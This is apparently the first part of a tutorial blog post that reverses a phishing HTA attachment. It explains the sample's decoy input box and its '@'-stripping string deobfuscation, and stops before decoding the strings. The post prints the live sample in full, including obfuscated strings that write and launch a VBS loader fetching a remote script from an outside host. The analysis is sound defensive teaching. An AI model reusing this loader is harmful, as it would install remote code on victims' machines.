Reversing an .HTA File - 1

We have recently received a URL inside of an email that redirected to a page that downloaded a zip file. Inside this zip file there was a .HTA file.

💡
This file is very simple and makes a good entry point to reversing for anyone interested in learning, since we do not have to deal with decompilers, debuggers and heavily obfuscated binaries.

An HTA (HTML Application) file is an application built from HTML plus a scripting language supported by Internet Explorer, such as JavaScript or VBScript.

The file we received had the following name: YBUKK43344Fac_JDHNXtu01192_raAXTLJ1487818681.HTA

I opened the file with a code editor such as Visual Studio Code. Since the code is HTML and JavaScript, the editor displays it nicely. The file looked like this:

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title> vS2h9rZwBiMfymyyzxnpnW32</title>
  <hta:application applicationname="RjrF80" scroll="yes" singleinstance="yes">

<script type="text/javascript">
window.moveTo(3162, 3581);
</script>


  <script language="VBScript">

a = InputBox("¿Cuál es la suma de 9 + 3?","Resuelve la pregunta","Respuesta")


    Sub RjrF80()
        msgbox("Error (cod JdtIcnOoxJ32)")
        close
    End Sub
</script>


<script type="text/javascript">
window.moveTo(3162, 3581);
function Vw3eX8X29()
{

var _$_N7nuQ8464=["\x40\x40\x62\x40\x40\x6C\x40\x61\x40\x40\x63\x40\x40\x40\x40\x6B\x40\x69\x40\x40\x6E\x40\x66\x40\x65\x40\x40\x63\x40\x74\x40\x40\x40\x40\x2E\x40\x64\x40\x40\x64\x40\x40\x6E\x40\x40\x73\x2E\x40\x40\x40\x6E\x40\x40\x40\x65\x40\x74","\x40\x57\x40\x40\x53\x40\x40\x40\x63\x40\x40\x40\x72\x40\x40\x69\x40\x40\x40\x70\x40\x40\x40\x74\x40\x2E\x40\x53\x40\x40\x68\x40\x40\x65\x40\x40\x40\x40\x6C\x40\x40\x40\x6C","\x40\x40\x40\x72\x40\x40\x40\x75\x40\x40\x6E","\x40\x40\x40\x40\x63\x40\x40\x40\x6D\x40\x40\x64\x40\x40\x40\x20\x40\x2F\x40\x40\x40\x56\x40\x2F\x40\x40\x44\x40\x2F\x40\x40\x40\x63\x40\x20\x65\x40\x63\x40\x68\x40\x6F\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x74\x40\x40\x40\x20\x40\x40\x40\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x5E\x40\x40\x40\x40\x22\x40\x41\x40\x40\x6D\x40\x40\x40\x68\x40\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x31\x3D\x40\x22\x40\x2E\x40\x40\x40\x40\x22\x40\x3A\x40\x40\x67\x40\x40\x4B\x40\x40\x46\x40\x40\x50\x40\x30\x40\x33\x40\x40\x39\x40\x40\x3D\x40\x40\x40\x40\x22\x40\x40\x69\x22\x40\x40\x3A\x40\x4D\x40\x59\x40\x40\x40\x55\x40\x40\x6E\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x36\x40\x3D\x40\x40\x22\x40\x40\x67\x40\x40\x40\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x40\x30\x40\x3D\x40\x40\x40\x40\x22\x40\x3A\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x40\x65\x40\x40\x74\x40\x4F\x40\x5E\x40\x40\x40\x22\x40\x3E\x40\x40\x40\x25\x40\x40\x70\x40\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x40\x25\x40\x40\x5C\x5C\x40\x40\x40\x53\x4B\x40\x40\x7A\x40\x40\x40\x34\x40\x38\x40\x33\x40\x36\x2E\x40\x40\x40\x76\x40\x40\x62\x40\x73\x40\x40\x40\x26\x40\x65\x40\x40\x40\x63\x40\x40\x40\x40\x68\x40\x40\x40\x40\x6F\x40\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x40\x65\x40\x40\x40\x74\x40\x40\x20\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x40\x40\x5E\x40\x40\x22\x40\x40\x62\x40\x40\x40\x6A\x40\x40\x40\x65\x63\x40\x40\x74\x40\x40\x28\x40\x40\x40\x22\x73\x40\x40\x43\x40\x40\x72\x40\x40
\x22\x40\x40\x40\x2B\x40\x40\x67\x40\x4B\x40\x46\x40\x40\x40\x50\x40\x40\x40\x30\x40\x40\x33\x40\x40\x40\x39\x40\x40\x2B\x40\x22\x40\x40\x40\x70\x40\x74\x40\x40\x22\x40\x2B\x40\x40\x47\x40\x40\x40\x6C\x40\x40\x40\x76\x40\x40\x38\x30\x40\x40\x40\x2B\x40\x40\x22\x40\x68\x54\x40\x22\x40\x2B\x40\x40\x22\x54\x40\x70\x40\x40\x40\x40\x73\x40\x22\x40\x40\x40\x40\x2B\x40\x47\x40\x40\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x30\x40\x2B\x40\x22\x2F\x40\x40\x40\x2F\x40\x62\x40\x6C\x61\x40\x40\x63\x6B\x40\x40\x69\x40\x6E\x40\x40\x66\x40\x65\x40\x40\x63\x40\x40\x40\x74\x40\x40\x40\x22\x40\x40\x2B\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x40\x40\x68\x40\x63\x40\x70\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x40\x40\x22\x40\x64\x40\x40\x64\x40\x40\x40\x6E\x73\x40\x40\x22\x40\x40\x2B\x40\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x68\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x22\x40\x6E\x40\x40\x40\x65\x40\x74\x40\x40\x40\x2F\x40\x40\x40\x2F\x40\x22\x40\x40\x2B\x40\x40\x40\x4D\x40\x59\x40\x55\x40\x40\x40\x6E\x40\x40\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x40\x40\x40\x36\x40\x2B\x40\x22\x40\x40\x31\x40\x22\x40\x40\x29\x40\x40\x40\x5E\x40\x22\x40\x40\x3E\x40\x40\x3E\x40\x40\x40\x25\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x25\x40\x40\x40\x5C\x40\x40\x40\x40\x5C\x40\x40\x40\x53\x40\x4B\x40\x40\x7A\x40\x40\x34\x40\x38\x40\x40\x40\x33\x40\x40\x40\x40\x36\x40\x40\x2E\x40\x76\x40\x40\x40\x62\x40\x40\x73\x40\x40\x26\x40\x40\x63\x40\x40\x40\x40\x3A\x40\x40\x5C\x40\x40\x5C\x40\x40\x77\x40\x69\x40\x6E\x40\x40\x64\x40\x40\x40\x6F\x40\x40\x77\x40\x40\x73\x40\x5C\x40\x5C\x40\x40\x73\x40\x40\x79\x40\x40\x73\x40\x40\x40\x40\x74\x40\x40\x40\x40\x65\x40\x40\x40\x6D\x40\x40\x40\x40\x33\x40\x32\x5C\x40\x40\x5C\x40\x40\x40\x63\x40\x6D\x40\x64\x40\x2E\x40\x65\x40\x40\x78\x65\x40\x20\x40\x2F\x40\x63\x40\x40\x20\x40\x40\x73\x40\x74\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x43\x40\x3A\x40\x40\x5C\x40\x5C\x40\x55
\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x40\x72\x40\x73\x40\x40\x5C\x40\x40\x5C\x40\x50\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x5C\x40\x40\x5C\x40\x40\x53\x40\x40\x4B\x40\x7A\x40\x40\x34\x40\x40\x38\x40\x40\x33\x40\x40\x40\x36\x40\x2E\x40\x40\x40\x76\x40\x62\x40\x73","\x40\x40\x40\x50\x40\x6F\x40\x40\x70\x40\x40\x75\x40\x40\x40\x70","\x40\x40\x40\x45\x40\x72\x40\x72\x40\x6F\x40\x40\x72\x20\x40\x40\x28\x40\x40\x63\x40\x40\x6F\x40\x40\x64\x40\x40\x40\x20\x40\x25\x40\x40\x73\x40\x40\x40\x72\x40\x61\x40\x40\x6E\x40\x40\x64\x40\x40\x40\x25\x40\x40\x29","\x40\x40\x40\x63\x40\x40\x6D\x40\x40\x40\x64\x40\x40\x20\x40\x40\x2F\x40\x40\x56\x40\x40\x40\x40\x2F\x40\x40\x44\x40\x40\x2F\x40\x40\x40\x40\x63\x40\x40\x20\x40\x40\x73\x40\x40\x74\x40\x40\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x40\x40\x25\x40\x40\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x25\x40\x40\x5C\x40\x5C\x40\x53\x40\x40\x4B\x40\x40\x40\x7A\x40\x34\x40\x38\x40\x33\x40\x40\x40\x36\x40\x40\x2E\x40\x40\x40\x76\x62\x40\x40\x40\x73"]

var yEiZU47 = new ActiveXObject(Bfnq6M43(_$_N7nuQ8464[1]));
yEiZU47[Bfnq6M43(_$_N7nuQ8464[2])](Bfnq6M43(_$_N7nuQ8464[3]),0);

}

function Bfnq6M43(VSxEf79) 
{
var roQ54 = new RegExp('@', 'g');
var AA7ldSL23 = VSxEf79.replace(roQ54, '');
return AA7ldSL23;
}


  </script>



</head>
<body  onload="Vw3eX8X29();RjrF80();"; >

<p class="hidden">TrwqUjO0JsTnq5iDIJGKEYeUJDvKkVfebkBm4NTGyiCi1jGLpwgsgDxjrU6PuGfkPWQIKFoNUp4UwYVGOCFWZ7MxbZgNoHo13v6HkMw70ZBekOcaSEHz1xlb3ogYBMvpohHJPA3dKQ1YEYmnM02vuVSBR2M1zsdZFOEWsKmo6C5dkmDuBoGYGTMfUzWoVKWrpSQzxXRFWcnEhnE4e4A9w4fpydIdw3wcTWfvCe4CYPvpvNTfo9kjPHOiad1E2eWEkJAWMH0RhUD9xBQvj7SHgUunS1pDUnrAnD1Eai2DlY3afC06k3mduvE6vj239AJmKLXUtrP1kR18jeeYgalqKzT2iHV9jyNcIqPvLNUKrHO1quDAycceTXxgwZUbgB8bJYtYaWErvByLemmJVDfsp0j0Cqfbrh3ZfKnn07XrYQG1IyD7FjsA82mrsGPgAzW9wtOcKwnEGVi08faQHbEiF2HMpzb47w7OHVAjlyVaDwYioTlIq20t5dZZI0Nq0hI7JE2SGTMy1cvf6UBTTLvjn61Ds5Ie7V0SmsGvmpkJOLy0Rpxj1MKomzjuNX816OCQyp4wLDkxE9uvyqQij67PaPb3brmAlzfOS0bXOwBWnw184USWA0XWxNPYxnALHM6PqPMBppMbY313eIWeKYxAf0A4LNlJX0sm7oByeHGfRMmRvHVuk7gngbek9ZZb0Gk2uVrHjwvGyYZUsOSHzXhfq27ePkGm7QGsOPmCpEDgCeqDknliDvDliN5a61MA6NPAi5wtMeTk2VnJqgNSsASVdw077vg7ILUO8mMVjSjecFMCuk4iyO9CqqoHShFtW3IldgAvUovb7V8ljKAwBp3PQJ4v2thsX4McbKujxdozpB7rmzFMsfJRSEujRo9Kj0VKPKvHJdrc6wWYapoz7gvLsNOHnFNeSwUCE9lSYk2XtPKBXisSkPrbkyWI2u6zcrzV39jPMpiqlgs1NONa0OVOIBHMXfbRE00dqFVOWZ0dLF0CdFSjffsGutGoH1Ormt7iFYl1FlB4N9gdleTuYeNa40w0vaUXeWP23otk0YBUfLegFofq6D9fYme9duHunGPfTWHjQhxvKycU0ZcG9bCO4dUunBTwhzWksJuE92Ob4dcSAY5rn1AJlbbSfK3XDTbYkgld4kPRFarVCvWhC5P9IxszO4i9KY3MThAK0YA3byEGGB7Vs7y5ymMvsGA30fK1mTaoQATq8XsC1AfAIOniS3r8R1T4hHsepmwatzF1hxykd7ZiNqSxH6yqLE4i3OZRT0ae1aZ6fnlNZJuJhLVK3Rw71WsC3H1m8hGxIIGtzWhftT2SQ1eZZah7o4r0caCxr56bqM3BEh27QQpYLMODxPNiyVmcbpyf0Xhdz0ztuWMni7Vpg5NguMV8bq806lRudLbae3jz6QbYlgzie9PZu3UlndUkvKQlxEBxGWZTudTBpmyqBrI80xlvWTuFodLAOlTBiz3kOd6WCvZskCanWnNfXS7DH2CpDXvjnY5CMVLLQQq27jFykvn17tOY8S3A4tIfma9R7Pyw8mBkUpzSQLHlReQwJqjBeJHkRNw13LlIv7TZ6GMlzDou5uiUhQoeZFeU79byngQ7GqyAUtqNP9d7acN6nAeHl4oC9Hg7fLxvzFvkr9s0YGH9H9ToQPJBiOjQ52GegK44</p> 

<p class="hidden">G4QgKQCpSSIaX4E8cyM59oC82SflcjOOekJW0zacKvoTiO1xpAbgEYolV1MRdo7K9d37C1jN1xL54WZM8sTATmmZdDZ3TSkRp42hI6wWwowO5RJgjzpckPGHEvHo7y7nI6DTRMqGGePIBtOY4uDpOtYyD00CiAgxyaQ2cYmhGthKbM87bSRd0INmM9rXFYZkxMiY4dVVFXFrFqPRZ5M60sx3gWNhCtJ6k318R4njRGSsUKuEKV112lys1Wfrm500KZBpRACiQWmpRaiSFrslIRupCU5w1lI2JDutYeN4zxBXlX8iuws1RdAboT4NmyUBmWrbwTMbsfc0L0rGOzlI1UL6RkWfsXow38WMFuCFRX8izxejN6ur7q5gFR0VhrxnnaH77Mld6EzrCTaPY6HvedfSr9eVhStKT5RGHFzhIVIyYx3CQcFzArT8XWXG6Did9xEHpNsqkWdjMcf2RarPfXYV9LXfqWj96rkwMfWOGC79qLy5nCdd1L3UsaZBz8g8ge3kM5qcK543H3rLZfEJSImfzkhxyNDp0WPSfInW7glIirNSBjweY0xT8EYRIXuZN9a2c5dM29PQ3pBQ4uYYmxjWPg6GjjGBB5SWUxa5OgBmbwlusX0wgePTXziQLHTIBj1GZhLEjQkb6aqaFK7pP14NbRUgjDcLcg5cvNfiSbDg0vjOHBPLsJap9cPcXFOjQHnMg9n25oc8GtiakdQgtUxqJ83SMg8goDDPsYHvdWN0ayi8ID4n7DQH3YHq28RRZEW2qwZvt4RFhnlO37nvJ9nr9Rp9qXK05G8T0BdGJMCRRhTvjOAU08dRiokAHxS61QBTi74egvqEyb57yV6hWtTYC7vWAlAaiKdnr0avFZyZY3YxCtkqeBTOBaT3Qe5oJbe4upckY1pMbFjrSJUQL73LDZZNKybPede4egGxWXynvWakz3O6rphZZsD6iqZse4MYUiqSN07PB8k9vLpbyXURR5aeVtYNuLgXJhdOftdc75KnyCEEUwo0xvbVeVoIMu5wWGXgYNg3AU302E26aGQIypxVEXHD9UKvxyi95tcNahJfjk0mUxIC0wHj3q9fcDjqePBGSjFD6kFnmgjcQyV7GqN2QmTmhEW2mLRDvCFojfWB3rgDiGdMkGeSEnpSHxqu6ZMrBkGycQvrTPNZ8TiEkglTiJHehMeBLv3FtZfNuzp2zL5yz3pFVkXAkAwIRmKQCoQfacrztkPAoZouGdBu1D3pDmujdytnLSjsJEy77bnQ2HCBkFrctCmosvNkFemz2XEiZEyb4OyyCVSVOt15BNVeOAwmnAtKI6pa3qQafdBExYtgt8YaxBmvt9pH0pnuUzZN7gX1Zz39OECMNQjHzS72whELxVNxGZcq7gIIhvewKOEsr4re0c49xssTnyvn1V1cvmQdgKFxKWJXdeSoEvyYx1lFl2YiHtSUgY5Q4pDsY8bpEp1BCE8xhnD9RrhmAlFyuWh8wSs47nvpdsyJvldvMVbuj1YM0MjQowQQ3IZX2m6XB4Qn5lGH00L0Uey3lIGnAnri9p99JPJzyMnHkftvwOMyJSzUypCy5C03CJJjxcX7dKTRfpMujsjkkP7yRjsdRg2E88b6HSt7t1tcnprZcIF3ceTaBMVijmAWqt7c2mcqtIpt5</p> 

<p class="hidden">w3HB0qmCHFOnjipQ5xStlcariZxYBCaKNPxLr78igLoO0oWR3K3WbtM52HhMongsSOcP9sZuD6k8a2fNfInxKLn92St7uZ1CN3uXtHwWBVLWgMXWn6Nbjt3b637gyAR3f36xrKqJnOzbV4TgOKr0uzwwYS0B5l3nX6zf1rTfcTmhZ3y1vLTrKiQI2fu7TxqhJuHm5ij2coBDM5N0eOXuCVO03qBxlwT131j6YzTTOwzcqzlUfaGj2HkZ9YUh5zLsvLyBmrij2XySjQ0BrVOli563JWVHrzrK3Q0xmeKX3H90</p> 

<p class="hidden">Tn0InV8xgEnILd4nmCSHcwDOg3Cnm5PttNP6X3tM4vckxs6jnXe5YeXMWHoFcrpLJu0qbuduII9y9pdoQaJhDtmRfRHCvOSbXlEftUijVSlJtI1gJ4CPvCCfZT9wWQa3dWvktVR3Gg6Ru7DFBHyGMwEHFmRMwNd8DJPNVfwuSimZBnM4wa1J02xdvTuclGgHK1Imt048n68ZkxVBITTsPyBPLDyVvnllbKVjsa0qQDJOmo88zF9pZYNroAHFIB3TK8Qqmhsg8VRlHOPkejmigTpiIgt5iU7oNqjFE72YbYwFeV8J6sHzr1gE1XKwPB7fvnzjkZihJxY7aFUr1YNEvDCTsYV07XFVSeUJLjcwINNjVDcGvMip7jYurjtXWcI3meydXLCzOyEUdviF1uTmj3KUXzEzkgPCAjXGHitPOTdBKtvRaWEToRs6yury7kMMe0hbkkpXj6NZv58PSpjknhkYPVMgjKsy1RTOY6URI9LBqygvPTASNdUXvXPQZXzv8sBPl2q33scQVWwyNDDqqA4XuCziIkCpKSYyuGZRBAQyrJEcVlLi7CzeGnXmSk6sIDkraculiqV6Q55wEVO4Zn0CF2ix2DDfxAa0R1g5cbhkmb8r2EeIPgbdkDjNbPQvc6lXCwzywOsuaKzv55</p> 

<p class="hidden">r2UQk0vPf9uRmJQpNYMPszkeGWZA0XzMPHl7syxbDF4tu8PVDse44dRNCrk3a4vgtbGvlW8TqlYSIK35XQ1qtepLe1XCOJBE7KkoqdhUkfguWmFpmexGT4rVAM799W0LKEgLTTVPNq9XlG1YwK86ZBmCG05CGlnqhTSiG7eYTr0DJRqIs9eh3ZhdkgZMvZmlDXqa0ulZtzpWQdGa3S5S6j8m6i2TtzJUaTCJncpJ6RrufcFxwwHsefZGQ29dfnopcxqhlvhVeRPM74MdtEEpx5uZ0zMgRV9C9RffQQeT0fY1Pe2kbckh5cn68ophTHI6gvwzJLmMFV826</p> 

<p class="hidden">kdKoeawFw2LgVwHB2THNdWLm2CdooOtfTpp7fIJBOfyLx44T6xveELuRK8zqJKrkpM7PupkTDG1UzmKWujTNOzKBMgrVjMJmdBz3O37GSNsjg33K54uUL0dcyQXB7NKgpCUvrfjZEsoQt9vQbTf9OlRJJqykJY5A7AVkWamVtEvKQjv6hhnZsKx4jjWRousO4VkLZgBLNODMMTHyNGDMSHviE62kPhEcc1Bq5r6o7UXAkroig4wyyjQxXTKx0TGxM2xGDoLl3XEE5fEavySIFuRYEEYyJ3RICaJONuqlV5tQbbaxOOGRuXkilPIJsowNZ3qDE6Oc51</p> 

<p class="hidden">tOQWuVYiQSpT7cHCqYHMohnEa1bRifCYVPZWQdytiZ3C1MNAYxEdZh8OKFfbsXEDcUnenn5zUufIXDqIgBWQLUiBixMNqIMlRQAie2vb4Bj1bjQU4MLLNzV8s3cw87lC3OGoXfWC6kMhKcGh8Zc3iKE1bWV0FOxYDPooChyi5jCRMrEJSqDeinkwFfZuKHtMRp9JLNXBMYewVdfcBA5kxyi9n24dVmYyR1kwtSscpxxkkkaDUdXJBR7Eggii0JCNBLWjrbovzW26yXGISEnWj5Fvq0XJsy6wO0XgYiecEExg51R0svX2rTJGJkYUtUWgn3GeGmDV9Um6FtY1IZajm8bvzpvRq50spKxJmQ1JzNrlkUwDKYTnaeuW7KAo8xPIVL6bK5f5OTAdAVqSBgAtPkQvnzEwvzO6HMxta48</p> 



</body>
</html>

At the beginning we have the standard HTML tags that define the name of the page, the language and the application name. If we scroll down a bit we see the opening of the script code.

First we have a block with VBScript code:

</script>

<!-- Establishes the language of this scripting block -->
  <script language="VBScript">

' Asks a question in Spanish in an InputBox
' The question translates to: "What is the sum of 9 + 3?"
a = InputBox("¿Cuál es la suma de 9 + 3?","Resuelve la pregunta","Respuesta")


    Sub RjrF80()
        msgbox("Error (cod JdtIcnOoxJ32)")
        close
    End Sub
</script>

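This block shows an InputBox that asks the user a question; the answer is stored in a and never used. The sub RjrF80() only shows an error message box and closes the window. This code does not seem to contain anything interesting.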

<script type="text/javascript">

window.moveTo(3162, 3581);

function Vw3eX8X29(){
    var _$_N7nuQ8464=["\x40\x40\x62\x40\x40\x6C\x40\x61\x40\x40\x63\x40\x40\x40\x40\x6B\x40\x69\x40\x40\x6E\x40\x66\x40\x65\x40\x40\x63\x40\x74\x40\x40\x40\x40\x2E\x40\x64\x40\x40\x64\x40\x40\x6E\x40\x40\x73\x2E\x40\x40\x40\x6E\x40\x40\x40\x65\x40\x74",
        "\x40\x57\x40\x40\x53\x40\x40\x40\x63\x40\x40\x40\x72\x40\x40\x69\x40\x40\x40\x70\x40\x40\x40\x74\x40\x2E\x40\x53\x40\x40\x68\x40\x40\x65\x40\x40\x40\x40\x6C\x40\x40\x40\x6C",
        "\x40\x40\x40\x72\x40\x40\x40\x75\x40\x40\x6E",
        "\x40\x40\x40\x40\x63\x40\x40\x40\x6D\x40\x40\x64\x40\x40\x40\x20\x40\x2F\x40\x40\x40\x56\x40\x2F\x40\x40\x44\x40\x2F\x40\x40\x40\x63\x40\x20\x65\x40\x63\x40\x68\x40\x6F\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x74\x40\x40\x40\x20\x40\x40\x40\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x5E\x40\x40\x40\x40\x22\x40\x41\x40\x40\x6D\x40\x40\x40\x68\x40\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x31\x3D\x40\x22\x40\x2E\x40\x40\x40\x40\x22\x40\x3A\x40\x40\x67\x40\x40\x4B\x40\x40\x46\x40\x40\x50\x40\x30\x40\x33\x40\x40\x39\x40\x40\x3D\x40\x40\x40\x40\x22\x40\x40\x69\x22\x40\x40\x3A\x40\x4D\x40\x59\x40\x40\x40\x55\x40\x40\x6E\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x36\x40\x3D\x40\x40\x22\x40\x40\x67\x40\x40\x40\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x40\x30\x40\x3D\x40\x40\x40\x40\x22\x40\x3A\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x40\x65\x40\x40\x74\x40\x4F\x40\x5E\x40\x40\x40\x22\x40\x3E\x40\x40\x40\x25\x40\x40\x70\x40\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x40\x25\x40\x40\x5C\x5C\x40\x40\x40\x53\x4B\x40\x40\x7A\x40\x40\x40\x34\x40\x38\x40\x33\x40\x36\x2E\x40\x40\x40\x76\x40\x40\x62\x40\x73\x40\x40\x40\x26\x40\x65\x40\x40\x40\x63\x40\x40\x40\x40\x68\x40\x40\x40\x40\x6F\x40\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x40\x65\x40\x40\x40\x74\x40\x40\x20\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x40\x40\x5E\x40\x40\x22\x40\x40\x62\x40\x40\x40\x6A\x40\x40\x40\x65\x63\x40\x40\x74\x40\x40\x28\x40\x40\x40\x22\x73\x40\x40\x43\x40\x40\x72\x40\x40\x22\x40\x40\x40\x2B\x40\x40\x67\x40\x4B\x40\x46\x40\x40\x40\x50\x40\x40\x40\x30\x40\x40\x33\x40\x40\x40\x39\x40\x40\x2B\x40\x22\x40\x40\x40\x70\x40\x74\x40\x40\x22\x40\x2B\x40\x40\x47\x40\x40\x40\x6C\x40\x40\x40\x76\x40\x40\x38\x30\x40\x40\x40\x2B\x40\x40\x22\x40\x68\x54\x40\x22\x40\x2B\x40\x40\x22\x54\x40\x70\x40\x40\x40\x40\x73\x40\x22\x40\x40\x40\x40\x2B\x40\x47\x40\x40\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x30\x40\x2B\x40\x22\x2F\x40\x40\x40\x2F\x40\x6
2\x40\x6C\x61\x40\x40\x63\x6B\x40\x40\x69\x40\x6E\x40\x40\x66\x40\x65\x40\x40\x63\x40\x40\x40\x74\x40\x40\x40\x22\x40\x40\x2B\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x40\x40\x68\x40\x63\x40\x70\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x40\x40\x22\x40\x64\x40\x40\x64\x40\x40\x40\x6E\x73\x40\x40\x22\x40\x40\x2B\x40\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x68\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x22\x40\x6E\x40\x40\x40\x65\x40\x74\x40\x40\x40\x2F\x40\x40\x40\x2F\x40\x22\x40\x40\x2B\x40\x40\x40\x4D\x40\x59\x40\x55\x40\x40\x40\x6E\x40\x40\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x40\x40\x40\x36\x40\x2B\x40\x22\x40\x40\x31\x40\x22\x40\x40\x29\x40\x40\x40\x5E\x40\x22\x40\x40\x3E\x40\x40\x3E\x40\x40\x40\x25\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x25\x40\x40\x40\x5C\x40\x40\x40\x40\x5C\x40\x40\x40\x53\x40\x4B\x40\x40\x7A\x40\x40\x34\x40\x38\x40\x40\x40\x33\x40\x40\x40\x40\x36\x40\x40\x2E\x40\x76\x40\x40\x40\x62\x40\x40\x73\x40\x40\x26\x40\x40\x63\x40\x40\x40\x40\x3A\x40\x40\x5C\x40\x40\x5C\x40\x40\x77\x40\x69\x40\x6E\x40\x40\x64\x40\x40\x40\x6F\x40\x40\x77\x40\x40\x73\x40\x5C\x40\x5C\x40\x40\x73\x40\x40\x79\x40\x40\x73\x40\x40\x40\x40\x74\x40\x40\x40\x40\x65\x40\x40\x40\x6D\x40\x40\x40\x40\x33\x40\x32\x5C\x40\x40\x5C\x40\x40\x40\x63\x40\x6D\x40\x64\x40\x2E\x40\x65\x40\x40\x78\x65\x40\x20\x40\x2F\x40\x63\x40\x40\x20\x40\x40\x73\x40\x74\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x43\x40\x3A\x40\x40\x5C\x40\x5C\x40\x55\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x40\x72\x40\x73\x40\x40\x5C\x40\x40\x5C\x40\x50\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x5C\x40\x40\x5C\x40\x40\x53\x40\x40\x4B\x40\x7A\x40\x40\x34\x40\x40\x38\x40\x40\x33\x40\x40\x40\x36\x40\x2E\x40\x40\x40\x76\x40\x62\x40\x73",
        "\x40\x40\x40\x50\x40\x6F\x40\x40\x70\x40\x40\x75\x40\x40\x40\x70",
        "\x40\x40\x40\x45\x40\x72\x40\x72\x40\x6F\x40\x40\x72\x20\x40\x40\x28\x40\x40\x63\x40\x40\x6F\x40\x40\x64\x40\x40\x40\x20\x40\x25\x40\x40\x73\x40\x40\x40\x72\x40\x61\x40\x40\x6E\x40\x40\x64\x40\x40\x40\x25\x40\x40\x29",
        "\x40\x40\x40\x63\x40\x40\x6D\x40\x40\x40\x64\x40\x40\x20\x40\x40\x2F\x40\x40\x56\x40\x40\x40\x40\x2F\x40\x40\x44\x40\x40\x2F\x40\x40\x40\x40\x63\x40\x40\x20\x40\x40\x73\x40\x40\x74\x40\x40\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x40\x40\x25\x40\x40\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x25\x40\x40\x5C\x40\x5C\x40\x53\x40\x40\x4B\x40\x40\x40\x7A\x40\x34\x40\x38\x40\x33\x40\x40\x40\x36\x40\x40\x2E\x40\x40\x40\x76\x62\x40\x40\x40\x73"]

    var yEiZU47 = new ActiveXObject(Bfnq6M43(_$_N7nuQ8464[1]));
    yEiZU47[Bfnq6M43(_$_N7nuQ8464[2])](Bfnq6M43(_$_N7nuQ8464[3]),0);

}

function Bfnq6M43(VSxEf79) {
    var roQ54 = new RegExp('@', 'g');
    var AA7ldSL23 = VSxEf79.replace(roQ54, '');
    return AA7ldSL23;
}


  </script>

If we shift our attention to the scripting block with JavaScript code we can see some more interesting stuff. The first function, Vw3eX8X29(), contains a variable named _$_N7nuQ8464 that holds 7 strings. The strings are written with every character as a hexadecimal escape (\xNN), including many \x40, which is the "@" character.

After that, the script creates the variable yEiZU47, an ActiveXObject whose type is given by the result of calling Bfnq6M43(), a function declared further down. Let's look at that function next.

Bfnq6M43() takes one input variable, presumably a String since that is what Vw3eX8X29() supplies when calling it. The function creates a regular expression, var roQ54 = new RegExp('@', 'g');, uses it to replace every match in the supplied string with an empty string, and returns the result.

So what does the regex do exactly?

  • @: This is the regular expression pattern. It will match the "@" character.

  • 'g': This is the flag for global matching. When set, the regular expression will match all occurrences of the pattern in the given string, not just the first one.

After understanding this function we can now try to decode the string to know what function Vw3eX8X29() is doing.

In order to decode we can just create a separate script with the code of function Bfnq6M43() and supply it the strings.



